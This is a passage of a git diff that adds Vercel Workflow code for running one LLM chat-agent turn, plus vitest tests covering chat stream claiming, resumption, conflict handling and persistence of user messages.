 create mode 100644 lib/supabase/chats/__tests__/updateChat.test.ts
 create mode 100644 lib/supabase/chats/updateChat.ts

diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts
new file mode 100644
index 000000000..352dcd265
--- /dev/null
+++ b/app/lib/workflows/runAgentStep.ts
@@ -0,0 +1,55 @@
+import { streamText, convertToModelMessages, type UIMessage, type UIMessageChunk } from "ai";
+import { gateway } from "@ai-sdk/gateway";
+import { agentCustomInstructions } from "@/lib/chat/agentCustomInstructions";
+
+export type RunAgentStepInput = {
+  messages: UIMessage[]; // run through `convertToModelMessages` before the model call
+  modelId: string; // handed to `gateway(...)` to pick the model
+  writable: WritableStream<UIMessageChunk>; // receives each chunk of the UI message stream
+};
+
+/**
+ * One LLM turn in the chat workflow agent loop. Runs as a Vercel Workflow
+ * `"use step"` so that:
+ *
+ *   - Sandbox-banned APIs (`fetch`, `setTimeout`, `crypto`) are legal inside.
+ *   - The result is cached as a single durable event — replays after a crash
+ *     do not re-bill the model.
+ *
+ * Streams every UI message chunk from `streamText` into `input.writable`.
+ * No tools are passed to the model yet; sandbox tools land in the follow-up
+ * PR (port `@open-harness/agent` tools + wire via `experimental_context`).
+ *
+ * @param input - Messages + selected model + the workflow's writable stream.
+ * @returns The model run's `finishReason`, which the calling workflow inspects.
+ */
+export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishReason: string }> {
+  "use step";
+
+  console.log("[runAgentStep] start", {
+    modelId: input.modelId,
+    messageCount: input.messages.length,
+  });
+
+  const modelMessages = convertToModelMessages(input.messages);
+  const result = streamText({
+    model: gateway(input.modelId),
+    system: agentCustomInstructions,
+    messages: modelMessages,
+  });
+
+  // Take the writer lock once for the whole stream and release it in `finally`
+  // so `writable` is unlocked even when a write or the model stream throws.
+  const writer = input.writable.getWriter();
+  try {
+    for await (const part of result.toUIMessageStream()) {
+      await writer.write(part);
+    }
+  } finally {
+    writer.releaseLock(); // unlock only — the stream itself is not closed here
+  }
+
+  const finishReason = await result.finishReason;
+  console.log("[runAgentStep] finish", { finishReason });
+  return { finishReason };
+}
diff --git a/app/lib/workflows/runAgentWorkflow.ts b/app/lib/workflows/runAgentWorkflow.ts
new file mode 100644
index 000000000..db679145a
--- /dev/null
+++ b/app/lib/workflows/runAgentWorkflow.ts
@@ -0,0 +1,56 @@
+import { getWritable } from "workflow";
+import type { UIMessage, UIMessageChunk } from "ai";
+import { runAgentStep } from "@/app/lib/workflows/runAgentStep";
+
+export type RunAgentWorkflowInput = {
+  messages: UIMessage[]; // forwarded unchanged to `runAgentStep`
+  chatId: string; // only used for log context in this file
+  sessionId: string; // only used for log context in this file
+  modelId: string; // forwarded to `runAgentStep` (and logged)
+};
+
+/**
+ * Vercel Workflow that drives the chat agent loop. The route handler calls
+ * `start(runAgentWorkflow, [...])` and pipes `run.getReadable()` back to the
+ * client; this function writes UIMessage chunks into the workflow's writable
+ * via `runAgentStep`.
+ *
+ * Currently runs a SINGLE `runAgentStep` turn. Looping is unsafe today: each
+ * iteration would re-send the original prompt without the assistant's
+ * tool-call response in scope, so a `tool-calls` finish reason would loop
+ * forever on the same input. The multi-turn shape (the step appends its
+ * response to `messages` before the next iteration) lands with the
+ * sandbox-tool port in PR 4. Until then a `tool-calls` finish only logs a
+ * warning and exits — the client gets the partial tool-call chunks, no follow-up turn.
+ *
+ * Workflow DevKit (WDK) constraints honored:
+ *   - All I/O (streamText, fetches) lives in `"use step"` functions.
+ *   - The workflow body only orchestrates — no fetch / setTimeout / fs / crypto.
+ *
+ * @param input - Messages, model id, and chat/session ids (the ids are only logged here).
+ */
+export async function runAgentWorkflow(input: RunAgentWorkflowInput): Promise<void> {
+  "use workflow";
+
+  console.log("[runAgentWorkflow] start", {
+    chatId: input.chatId,
+    sessionId: input.sessionId,
+    modelId: input.modelId,
+  });
+
+  const writable = getWritable<UIMessageChunk>();
+  const result = await runAgentStep({
+    messages: input.messages,
+    modelId: input.modelId,
+    writable,
+  });
+
+  if (result.finishReason === "tool-calls") {
+    console.warn(
+      "[runAgentWorkflow] model returned tool-calls but tool execution is not wired yet; exiting after 1 turn",
+      { chatId: input.chatId },
+    );
+  } else {
+    console.log("[runAgentWorkflow] finish", { finishReason: result.finishReason });
+  }
+}
diff --git a/lib/chat/__tests__/compareAndSetChatActiveStreamId.test.ts b/lib/chat/__tests__/compareAndSetChatActiveStreamId.test.ts
new file mode 100644
index 000000000..af22bd363
--- /dev/null
+++ b/lib/chat/__tests__/compareAndSetChatActiveStreamId.test.ts
@@ -0,0 +1,51 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { compareAndSetChatActiveStreamId } from "@/lib/chat/compareAndSetChatActiveStreamId";
+import { updateChat } from "@/lib/supabase/chats/updateChat";
+
+vi.mock("@/lib/supabase/chats/updateChat", () => ({
+  updateChat: vi.fn(),
+}));
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("compareAndSetChatActiveStreamId", () => {
+  it("returns ok:true claimed:true when the row predicate matches and is updated", async () => {
+    vi.mocked(updateChat).mockResolvedValue({ ok: true, rowsUpdated: 1, row: null });
+    const result = await compareAndSetChatActiveStreamId("chat-1", null, "wrun_x");
+    expect(result).toEqual({ ok: true, claimed: true }); // rowsUpdated: 1 → claimed
+    expect(updateChat).toHaveBeenCalledWith(
+      { id: "chat-1", where: { active_stream_id: null } }, // predicate: expected current value
+      { active_stream_id: "wrun_x" }, // patch: next value
+    );
+  });
+
+  it("returns ok:true claimed:false when the predicate matches no rows (race lost)", async () => {
+    vi.mocked(updateChat).mockResolvedValue({ ok: true, rowsUpdated: 0, row: null });
+    const result = await compareAndSetChatActiveStreamId("chat-1", null, "wrun_x");
+    expect(result).toEqual({ ok: true, claimed: false }); // rowsUpdated: 0 → not claimed
+  });
+
+  it("returns ok:false with the underlying error on DB failure (distinct from race lost)", async () => {
+    vi.mocked(updateChat).mockResolvedValue({ ok: false, error: "down" });
+    const result = await compareAndSetChatActiveStreamId("chat-1", null, "wrun_x");
+    expect(result).toEqual({ ok: false, error: "down" }); // error is passed through as-is
+  });
+
+  it("supports expecting a specific run id (placeholder → real promotion)", async () => {
+    vi.mocked(updateChat).mockResolvedValue({ ok: true, rowsUpdated: 1, row: null });
+    await compareAndSetChatActiveStreamId("chat-1", "pending-abc", "wrun_real");
+    expect(updateChat).toHaveBeenCalledWith(
+      { id: "chat-1", where: { active_stream_id: "pending-abc" } },
+      { active_stream_id: "wrun_real" },
+    );
+  });
+
+  it("supports next=null (releasing the slot)", async () => {
+    vi.mocked(updateChat).mockResolvedValue({ ok: true, rowsUpdated: 1, row: null });
+    await compareAndSetChatActiveStreamId("chat-1", "wrun_old", null);
+    expect(updateChat).toHaveBeenCalledWith(
+      { id: "chat-1", where: { active_stream_id: "wrun_old" } },
+      { active_stream_id: null },
+    );
+  });
+});
diff --git a/lib/chat/__tests__/handleChatWorkflowStream.test.ts b/lib/chat/__tests__/handleChatWorkflowStream.test.ts
index c61911be8..fb3b434f1 100644
--- a/lib/chat/__tests__/handleChatWorkflowStream.test.ts
+++ b/lib/chat/__tests__/handleChatWorkflowStream.test.ts
@@ -6,22 +6,38 @@ import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow";
 import { selectSessions } from "@/lib/supabase/sessions/selectSessions";
 import { selectChats } from "@/lib/supabase/chats/selectChats";
 import { isSandboxActive } from "@/lib/sandbox/isSandboxActive";
+import { updateSession } from "@/lib/supabase/sessions/updateSession";
+import { compareAndSetChatActiveStreamId } from "@/lib/chat/compareAndSetChatActiveStreamId";
+import { maybeResumeChatStream } from "@/lib/chat/maybeResumeChatStream";
+import { persistLatestUserMessage } from "@/lib/chat/persistLatestUserMessage";
+import { start, getRun } from "workflow/api";
 
-vi.mock("@/lib/chat/validateChatWorkflow", () => ({
-  validateChatWorkflow: vi.fn(),
+vi.mock("@/lib/chat/validateChatWorkflow", () => ({ validateChatWorkflow: vi.fn() }));
+vi.mock("@/lib/supabase/sessions/selectSessions", () => ({ selectSessions: vi.fn() }));
+vi.mock("@/lib/supabase/chats/selectChats", () => ({ selectChats: vi.fn() }));
+vi.mock("@/lib/chat/compareAndSetChatActiveStreamId", () => ({
+  compareAndSetChatActiveStreamId: vi.fn(),
 }));
-vi.mock("@/lib/supabase/sessions/selectSessions", () => ({
-  selectSessions: vi.fn(),
+vi.mock("@/lib/sandbox/isSandboxActive", () => ({ isSandboxActive: vi.fn() }));
+vi.mock("@/lib/supabase/sessions/updateSession", () => ({ updateSession: vi.fn() }));
+vi.mock("@/lib/sandbox/buildActiveLifecycleUpdate", () => ({
+  buildActiveLifecycleUpdate: vi.fn(() => ({})),
 }));
-vi.mock("@/lib/supabase/chats/selectChats", () => ({
-  selectChats: vi.fn(),
+vi.mock("@/lib/chat/maybeResumeChatStream", () => ({
+  maybeResumeChatStream: vi.fn(),
 }));
-vi.mock("@/lib/sandbox/isSandboxActive", () => ({
-  isSandboxActive: vi.fn(),
+vi.mock("@/lib/chat/persistLatestUserMessage", () => ({
+  persistLatestUserMessage: vi.fn(),
 }));
+vi.mock("workflow/api", () => ({
+  start: vi.fn(),
+  getRun: vi.fn(),
+}));
+vi.mock("@/app/lib/workflows/runAgentWorkflow", () => ({ runAgentWorkflow: vi.fn() }));
 vi.mock("@/lib/networking/getCorsHeaders", () => ({
   getCorsHeaders: vi.fn(() => ({ "Access-Control-Allow-Origin": "*" })),
 }));
+vi.mock("@/lib/uuid/generateUUID", () => ({ default: vi.fn(() => "deterministic-uuid") }));
 
 const ACCOUNT_ID = "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa";
 const OTHER_ACCOUNT_ID = "bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb";
@@ -36,130 +52,275 @@ function makeRequest(): NextRequest {
   });
 }
 
-function mockValidatedRequest(overrides: Partial<{ accountId: string }> = {}) {
+function mockValidated() {
   vi.mocked(validateChatWorkflow).mockResolvedValue({
     messages: [],
     chatId: CHAT_ID,
     sessionId: SESSION_ID,
-    accountId: overrides.accountId ?? ACCOUNT_ID,
+    accountId: ACCOUNT_ID,
     orgId: null,
     authToken: "test-key",
   });
 }
 
-function mockOwnedSessionWithActiveSandbox() {
-  mockValidatedRequest();
+function mockSessionOwnedActive(extra: Record<string, unknown> = {}) {
   vi.mocked(selectSessions).mockResolvedValue([
-    { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never,
+    { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true }, ...extra } as never,
   ]);
-  vi.mocked(selectChats).mockResolvedValue([{ id: CHAT_ID, session_id: SESSION_ID } as never]);
   vi.mocked(isSandboxActive).mockReturnValue(true);
 }
 
-describe("handleChatWorkflowStream (stub)", () => {
-  beforeEach(() => {
-    vi.clearAllMocks();
+function mockChatOwned(extra: Record<string, unknown> = {}) {
+  vi.mocked(selectChats).mockResolvedValue([
+    {
+      id: CHAT_ID,
+      session_id: SESSION_ID,
+      active_stream_id: null,
+      model_id: null,
+      ...extra,
+    } as never,
+  ]);
+}
+
+function mockStartedRun(runId = "wrun_test_run_1") {
+  const stream = new ReadableStream<unknown>({
+    start(controller) {
+      controller.enqueue({ type: "text-start", id: "a" });
+      controller.close();
+    },
   });
+  vi.mocked(start).mockResolvedValue({ runId, getReadable: () => stream } as never);
+  vi.mocked(getRun).mockReturnValue({ cancel: vi.fn(() => Promise.resolve()) } as never);
+  return { runId, stream };
+}
+
+beforeEach(() => {
+  vi.clearAllMocks();
+  // Default: maybeResumeChatStream returns null (no resume / no active stream)
+  vi.mocked(maybeResumeChatStream).mockResolvedValue(null);
+});
 
-  describe("validation short-circuits", () => {
-    it("returns the validator's short-circuit response unchanged (e.g. 401)", async () => {
-      const authError = NextResponse.json(
-        { status: "error", error: "Unauthorized" },
-        { status: 401 },
+describe("handleChatWorkflowStream", () => {
+  describe("short-circuit responses", () => {
+    it("passes through the validator's response (401/400)", async () => {
+      vi.mocked(validateChatWorkflow).mockResolvedValue(
+        NextResponse.json({ status: "error", error: "Unauthorized" }, { status: 401 }),
       );
-      vi.mocked(validateChatWorkflow).mockResolvedValue(authError);
       const res = await handleChatWorkflowStream(makeRequest());
       expect(res.status).toBe(401);
+      expect(start).not.toHaveBeenCalled();
     });
 
-    it("returns the validator's 400 unchanged (e.g. invalid body)", async () => {
-      const badBody = NextResponse.json(
-        { status: "error", error: "Invalid JSON body" },
-        { status: 400 },
-      );
-      vi.mocked(validateChatWorkflow).mockResolvedValue(badBody);
+    it("returns 500 when selectSessions errors", async () => {
+      mockValidated();
+      vi.mocked(selectSessions).mockResolvedValue(null);
       const res = await handleChatWorkflowStream(makeRequest());
-      expect(res.status).toBe(400);
+      expect(res.status).toBe(500);
     });
-  });
 
-  describe("session / chat ownership", () => {
-    beforeEach(() => mockValidatedRequest());
-
-    it("returns 404 when the session does not exist", async () => {
+    it("returns 404 when session does not exist", async () => {
+      mockValidated();
       vi.mocked(selectSessions).mockResolvedValue([]);
       const res = await handleChatWorkflowStream(makeRequest());
       expect(res.status).toBe(404);
     });
 
-    it("returns 500 when selectSessions errors (returns null)", async () => {
-      vi.mocked(selectSessions).mockResolvedValue(null);
-      const res = await handleChatWorkflowStream(makeRequest());
-      expect(res.status).toBe(500);
-    });
-
-    it("returns 403 when the session is owned by a different account", async () => {
+    it("returns 403 when session not owned", async () => {
+      mockValidated();
       vi.mocked(selectSessions).mockResolvedValue([
-        { id: SESSION_ID, account_id: OTHER_ACCOUNT_ID, sandbox_state: { ready: true } } as never,
+        { id: SESSION_ID, account_id: OTHER_ACCOUNT_ID, sandbox_state: {} } as never,
       ]);
       const res = await handleChatWorkflowStream(makeRequest());
       expect(res.status).toBe(403);
     });
 
-    it("returns 400 'Sandbox not initialized' when sandbox is inactive", async () => {
+    it("returns 400 when sandbox is inactive", async () => {
+      mockValidated();
       vi.mocked(selectSessions).mockResolvedValue([
         { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: null } as never,
       ]);
       vi.mocked(isSandboxActive).mockReturnValue(false);
       const res = await handleChatWorkflowStream(makeRequest());
       expect(res.status).toBe(400);
-      const body = await res.json();
-      expect(body.error).toMatch(/sandbox/i);
     });
 
-    it("returns 404 when the chat does not exist", async () => {
-      vi.mocked(selectSessions).mockResolvedValue([
-        { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never,
-      ]);
-      vi.mocked(isSandboxActive).mockReturnValue(true);
+    it("returns 404 when chat does not exist", async () => {
+      mockValidated();
+      mockSessionOwnedActive();
       vi.mocked(selectChats).mockResolvedValue([]);
       const res = await handleChatWorkflowStream(makeRequest());
       expect(res.status).toBe(404);
     });
+  });
 
-    it("returns 404 when chat exists but belongs to a different session", async () => {
-      vi.mocked(selectSessions).mockResolvedValue([
-        { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never,
-      ]);
-      vi.mocked(isSandboxActive).mockReturnValue(true);
-      vi.mocked(selectChats).mockResolvedValue([
-        { id: CHAT_ID, session_id: "different-session" } as never,
-      ]);
+  describe("resume / conflict via maybeResumeChatStream", () => {
+    beforeEach(() => {
+      mockValidated();
+      mockSessionOwnedActive();
+      mockChatOwned({ active_stream_id: "wrun_existing" });
+    });
+
+    it("returns the resume response when maybeResumeChatStream yields one", async () => {
+      const resumeResponse = new Response("ok", {
+        status: 200,
+        headers: { "x-workflow-run-id": "wrun_existing" },
+      });
+      vi.mocked(maybeResumeChatStream).mockResolvedValue(resumeResponse);
       const res = await handleChatWorkflowStream(makeRequest());
-      expect(res.status).toBe(404);
+      expect(res.headers.get("x-workflow-run-id")).toBe("wrun_existing");
+      expect(start).not.toHaveBeenCalled();
+    });
+
+    it("returns the conflict response when maybeResumeChatStream yields 409", async () => {
+      const conflict = NextResponse.json({ status: "error", error: "conflict" }, { status: 409 });
+      vi.mocked(maybeResumeChatStream).mockResolvedValue(conflict);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(409);
+      expect(start).not.toHaveBeenCalled();
     });
   });
 
-  describe("success (stub response)", () => {
-    beforeEach(() => mockOwnedSessionWithActiveSandbox());
+  describe("placeholder CAS before start", () => {
+    beforeEach(() => {
+      mockValidated();
+      mockSessionOwnedActive();
+      mockChatOwned();
+    });
+
+    it("returns 500 when the placeholder-CAS hits a DB error", async () => {
+      vi.mocked(compareAndSetChatActiveStreamId).mockResolvedValueOnce({
+        ok: false,
+        error: "down",
+      });
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(500);
+      expect(start).not.toHaveBeenCalled();
+    });
 
-    it("returns 200 with text/event-stream content type", async () => {
+    it("returns 409 (without calling start) when the placeholder-CAS loses the race", async () => {
+      vi.mocked(compareAndSetChatActiveStreamId).mockResolvedValueOnce({
+        ok: true,
+        claimed: false,
+      });
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(409);
+      expect(start).not.toHaveBeenCalled();
+    });
+
+    it("starts the workflow only after placeholder CAS succeeds", async () => {
+      // First CAS = placeholder claim, second CAS = promote placeholder → real run id
+      vi.mocked(compareAndSetChatActiveStreamId)
+        .mockResolvedValueOnce({ ok: true, claimed: true })
+        .mockResolvedValueOnce({ ok: true, claimed: true });
+      mockStartedRun();
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(200);
+      expect(start).toHaveBeenCalled();
+      // Confirm CAS-before-start ordering — first CAS pre-claims with expected=null
+      const firstCallArgs = vi.mocked(compareAndSetChatActiveStreamId).mock.calls[0];
+      expect(firstCallArgs?.[0]).toBe(CHAT_ID);
+      expect(firstCallArgs?.[1]).toBeNull();
+      expect(firstCallArgs?.[2]).toMatch(/^pending-/);
+    });
+  });
+
+  describe("happy path", () => {
+    beforeEach(() => {
+      mockValidated();
+      mockSessionOwnedActive();
+      mockChatOwned();
+      vi.mocked(compareAndSetChatActiveStreamId)
+        .mockResolvedValueOnce({ ok: true, claimed: true })
+        .mockResolvedValueOnce({ ok: true, claimed: true });
+    });
+
+    it("returns 200 with text/event-stream and x-workflow-run-id", async () => {
+      const { runId } = mockStartedRun("wrun_abc_123");
       const res = await handleChatWorkflowStream(makeRequest());
       expect(res.status).toBe(200);
       expect(res.headers.get("content-type") ?? "").toMatch(/text\/event-stream/);
+      expect(res.headers.get("x-workflow-run-id")).toBe(runId);
+    });
+
+    it("refreshes session lifecycle activity", async () => {
+      mockStartedRun();
+      await handleChatWorkflowStream(makeRequest());
+      expect(updateSession).toHaveBeenCalledWith(SESSION_ID, expect.any(Object));
+    });
+
+    it("fire-and-forgets persistLatestUserMessage", async () => {
+      mockStartedRun();
+      await handleChatWorkflowStream(makeRequest());
+      expect(persistLatestUserMessage).toHaveBeenCalledWith(CHAT_ID, []);
+    });
+
+    it("passes chat.model_id into the workflow when set", async () => {
+      vi.mocked(selectChats).mockResolvedValue([
+        {
+          id: CHAT_ID,
+          session_id: SESSION_ID,
+          active_stream_id: null,
+          model_id: "anthropic/claude-opus-4.6",
+        } as never,
+      ]);
+      mockStartedRun();
+      await handleChatWorkflowStream(makeRequest());
+      const startArgs = vi.mocked(start).mock.calls[0]?.[1]?.[0] as { modelId: string };
+      expect(startArgs.modelId).toBe("anthropic/claude-opus-4.6");
+    });
+
+    it("falls back to the default model when chat.model_id is null", async () => {
+      mockStartedRun();
+      await handleChatWorkflowStream(makeRequest());
+      const startArgs = vi.mocked(start).mock.calls[0]?.[1]?.[0] as { modelId: string };
+      expect(startArgs.modelId).toBe("anthropic/claude-haiku-4.5");
+    });
+  });
+
+  describe("promote placeholder → run id", () => {
+    beforeEach(() => {
+      mockValidated();
+      mockSessionOwnedActive();
+      mockChatOwned();
     });
 
-    it("sets an x-workflow-run-id response header starting with stub-", async () => {
+    it("awaits cancel() and returns 409 if promote loses", async () => {
+      vi.mocked(compareAndSetChatActiveStreamId)
+        .mockResolvedValueOnce({ ok: true, claimed: true }) // claim ok
+        .mockResolvedValueOnce({ ok: true, claimed: false }); // promote raced
+      const cancel = vi.fn(() => Promise.resolve());
+      vi.mocked(start).mockResolvedValue({
+        runId: "wrun_lost",
+        getReadable: () => new ReadableStream(),
+      } as never);
+      vi.mocked(getRun).mockReturnValue({ cancel } as never);
       const res = await handleChatWorkflowStream(makeRequest());
-      const runId = res.headers.get("x-workflow-run-id");
-      expect(runId).toBeTruthy();
-      expect(runId!.startsWith("stub-")).toBe(true);
+      expect(res.status).toBe(409);
+      expect(getRun).toHaveBeenCalledWith("wrun_lost");
+      expect(cancel).toHaveBeenCalled();
     });
 
-    it("emits a stream body that includes the stub assistant text", async () => {
+    it("still returns 409 if cancel() throws (best-effort)", async () => {
+      vi.mocked(compareAndSetChatActiveStreamId)
+        .mockResolvedValueOnce({ ok: true, claimed: true })
+        .mockResolvedValueOnce({ ok: true, claimed: false });
+      vi.mocked(start).mockResolvedValue({
+        runId: "wrun_lost",
+        getReadable: () => new ReadableStream(),
+      } as never);
+      // Wrap rejection in an async IIFE + attach a noop handler so Vitest's
+      // unhandled-rejection watcher doesn't fire before the SUT awaits.
+      const cancelRejection = (async () => {
+        throw new Error("cancel exploded");
+      })();
+      cancelRejection.catch(() => {
+        /* SUT will await this and convert to logged catch */
+      });
+      vi.mocked(getRun).mockReturnValue({
+        cancel: vi.fn(() => cancelRejection),
+      } as never);
       const res = await handleChatWorkflowStream(makeRequest());
-      const text = await res.text();
-      expect(text).toContain("Hello from /api/chat/workflow");
+      expect(res.status).toBe(409);
     });
   });
 });
diff --git a/lib/chat/__tests__/maybeResumeChatStream.test.ts b/lib/chat/__tests__/maybeResumeChatStream.test.ts
new file mode 100644
index 000000000..999c29d24
--- /dev/null
+++ b/lib/chat/__tests__/maybeResumeChatStream.test.ts
@@ -0,0 +1,46 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { maybeResumeChatStream } from "@/lib/chat/maybeResumeChatStream";
+import { reconcileExistingActiveStream } from "@/lib/chat/reconcileExistingActiveStream";
+
+vi.mock("@/lib/chat/reconcileExistingActiveStream", () => ({
+  reconcileExistingActiveStream: vi.fn(),
+}));
+vi.mock("@/lib/networking/getCorsHeaders", () => ({
+  getCorsHeaders: vi.fn(() => ({ "Access-Control-Allow-Origin": "*" })),
+}));
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("maybeResumeChatStream", () => {
+  it("returns null when there is no active_stream_id", async () => {
+    const res = await maybeResumeChatStream("chat-1", null); // 2nd arg: the chat's active_stream_id
+    expect(res).toBeNull();
+    expect(reconcileExistingActiveStream).not.toHaveBeenCalled(); // nothing to reconcile
+  });
+
+  it("returns null when reconcile says action=ready", async () => {
+    vi.mocked(reconcileExistingActiveStream).mockResolvedValue({ action: "ready" });
+    const res = await maybeResumeChatStream("chat-1", "wrun_dead");
+    expect(res).toBeNull(); // null = no response to short-circuit with
+  });
+
+  it("returns a 200 SSE response with x-workflow-run-id on resume", async () => {
+    const stream = new ReadableStream();
+    vi.mocked(reconcileExistingActiveStream).mockResolvedValue({
+      action: "resume",
+      runId: "wrun_live",
+      stream,
+    });
+    const res = await maybeResumeChatStream("chat-1", "wrun_live");
+    expect(res).not.toBeNull();
+    expect(res!.status).toBe(200);
+    expect(res!.headers.get("x-workflow-run-id")).toBe("wrun_live");
+    expect(res!.headers.get("content-type") ?? "").toMatch(/text\/event-stream/);
+  });
+
+  it("returns a 409 on conflict", async () => {
+    vi.mocked(reconcileExistingActiveStream).mockResolvedValue({ action: "conflict" });
+    const res = await maybeResumeChatStream("chat-1", "wrun_x");
+    expect(res!.status).toBe(409);
+  });
+});
diff --git a/lib/chat/__tests__/persistLatestUserMessage.test.ts b/lib/chat/__tests__/persistLatestUserMessage.test.ts
new file mode 100644
index 000000000..28d4f7650
--- /dev/null
+++ b/lib/chat/__tests__/persistLatestUserMessage.test.ts
@@ -0,0 +1,129 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { persistLatestUserMessage } from "@/lib/chat/persistLatestUserMessage";
+
+import { upsertChatMessage } from "@/lib/supabase/chat_messages/upsertChatMessage";
+import { selectChatMessages } from "@/lib/supabase/chat_messages/selectChatMessages";
+import { updateChat } from "@/lib/supabase/chats/updateChat";
+
+vi.mock("@/lib/supabase/chat_messages/upsertChatMessage", () => ({
+  upsertChatMessage: vi.fn(),
+}));
+vi.mock("@/lib/supabase/chat_messages/selectChatMessages", () => ({
+  selectChatMessages: vi.fn(),
+}));
+vi.mock("@/lib/supabase/chats/updateChat", () => ({
+  updateChat: vi.fn(),
+}));
+
+const CHAT_ID = "chat-1";
+const MSG_ID = "msg-1";
+
+function userMessage(text = "hello world", id = MSG_ID) {
+  return { id, role: "user" as const, parts: [{ type: "text" as const, text }] }; // one text part
+}
+
+beforeEach(() => {
+  vi.clearAllMocks();
+});
+
+describe("persistLatestUserMessage", () => {
+  it("no-ops when the last message is not a user message", async () => {
+    await persistLatestUserMessage(CHAT_ID, [{ id: "a", role: "assistant", parts: [] } as never]);
+    expect(upsertChatMessage).not.toHaveBeenCalled(); // nothing is written at all
+    expect(updateChat).not.toHaveBeenCalled();
+  });
+
+  it("no-ops when messages array is empty", async () => {
+    await persistLatestUserMessage(CHAT_ID, []);
+    expect(upsertChatMessage).not.toHaveBeenCalled();
+  });
+
+  it("bails on DB error (upsert ok:false) without touching the chat", async () => {
+    vi.mocked(upsertChatMessage).mockResolvedValue({ ok: false, error: "down" });
+    await persistLatestUserMessage(CHAT_ID, [userMessage()]);
+    expect(updateChat).not.toHaveBeenCalled(); // failed insert must not bump the chat
+  });
+
+  it("bails on duplicate (already persisted) without touching the chat", async () => {
+    vi.mocked(upsertChatMessage).mockResolvedValue({ ok: true, row: null, isDuplicate: true });
+    await persistLatestUserMessage(CHAT_ID, [userMessage()]);
+    expect(updateChat).not.toHaveBeenCalled(); // re-sent message must not bump the chat
+  });
+
+  it("touches updated_at after a new insert", async () => {
+    vi.mocked(upsertChatMessage).mockResolvedValue({
+      ok: true,
+      row: { id: MSG_ID } as never,
+      isDuplicate: false,
+    });
+    vi.mocked(selectChatMessages).mockResolvedValue([{ id: "different-msg" } as never]);
+    await persistLatestUserMessage(CHAT_ID, [userMessage()]);
+    const firstCall = vi.mocked(updateChat).mock.calls[0];
+    expect(firstCall?.[0]).toEqual({ id: CHAT_ID }); // selector has no `where` predicate
+    expect(firstCall?.[1]).toMatchObject({ updated_at: expect.any(String) });
+  });
+
+  it("sets chat.title when the inserted message is the earliest", async () => {
+    vi.mocked(upsertChatMessage).mockResolvedValue({
+      ok: true,
+      row: { id: MSG_ID } as never,
+      isDuplicate: false,
+    });
+    vi.mocked(selectChatMessages).mockResolvedValue([{ id: MSG_ID } as never]);
+    await persistLatestUserMessage(CHAT_ID, [userMessage("Hello there from a test")]);
+    const titleCall = vi
+      .mocked(updateChat)
+      .mock.calls.find(c => (c[1] as { title?: string }).title !== undefined);
+    expect(titleCall?.[1]).toEqual({ title: "Hello there from a test" });
+  });
+
+  it("skips title when the inserted message is no longer the earliest", async () => {
+    vi.mocked(upsertChatMessage).mockResolvedValue({
+      ok: true,
+      row: { id: MSG_ID } as never,
+      isDuplicate: false,
+    });
+    vi.mocked(selectChatMessages).mockResolvedValue([{ id: "older-msg" } as never]);
+    await persistLatestUserMessage(CHAT_ID, [userMessage()]);
+    const titleCall = vi
+      .mocked(updateChat)
+      .mock.calls.find(c => (c[1] as { title?: string }).title !== undefined);
+    expect(titleCall).toBeUndefined(); // no update carried a `title` field
+  });
+
+  it("truncates titles to exactly TITLE_MAX_LENGTH including the suffix", async () => {
+    vi.mocked(upsertChatMessage).mockResolvedValue({
+      ok: true,
+      row: { id: MSG_ID } as never,
+      isDuplicate: false,
+    });
+    vi.mocked(selectChatMessages).mockResolvedValue([{ id: MSG_ID } as never]);
+    const long = "x".repeat(120); // longer than the 80-char cap asserted below
+    await persistLatestUserMessage(CHAT_ID, [userMessage(long)]);
+    const titleCall = vi
+      .mocked(updateChat)
+      .mock.calls.find(c => (c[1] as { title?: string }).title !== undefined);
+    const title = (titleCall?.[1] as { title: string }).title;
+    expect(title.length).toBe(80);
+    expect(title.endsWith("…")).toBe(true); // the ellipsis counts toward the 80
+  });
+
+  it("bails on title-set when selectChatMessages errors (null)", async () => {
+    vi.mocked(upsertChatMessage).mockResolvedValue({
+      ok: true,
+      row: { id: MSG_ID } as never,
+      isDuplicate: false,
+    });
+    vi.mocked(selectChatMessages).mockResolvedValue(null);
+    await persistLatestUserMessage(CHAT_ID, [userMessage()]);
+    const titleCall = vi
+      .mocked(updateChat)
+      .mock.calls.find(c => (c[1] as { title?: string }).title !== undefined);
+    expect(titleCall).toBeUndefined(); // read failure → title left untouched
+  });
+
+  it("swallows thrown errors without escaping", async () => {
+    vi.mocked(upsertChatMessage).mockRejectedValue(new Error("boom"));
+    await expect(persistLatestUserMessage(CHAT_ID, [userMessage()])).resolves.toBeUndefined();
+  });
+});
diff --git a/lib/chat/__tests__/reconcileExistingActiveStream.test.ts b/lib/chat/__tests__/reconcileExistingActiveStream.test.ts
new file mode 100644
index 000000000..b40e12ce6
--- /dev/null
+++ b/lib/chat/__tests__/reconcileExistingActiveStream.test.ts
@@ -0,0 +1,92 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { reconcileExistingActiveStream } from "@/lib/chat/reconcileExistingActiveStream";
+import { getRun } from "workflow/api";
+import { compareAndSetChatActiveStreamId } from "@/lib/chat/compareAndSetChatActiveStreamId";
+
+vi.mock("workflow/api", () => ({
+  getRun: vi.fn(), // configured per test (mockRun / mockImplementation / mockReturnValue)
+}));
+vi.mock("@/lib/chat/compareAndSetChatActiveStreamId", () => ({
+  compareAndSetChatActiveStreamId: vi.fn(), // CAS outcome is set per test
+}));
+
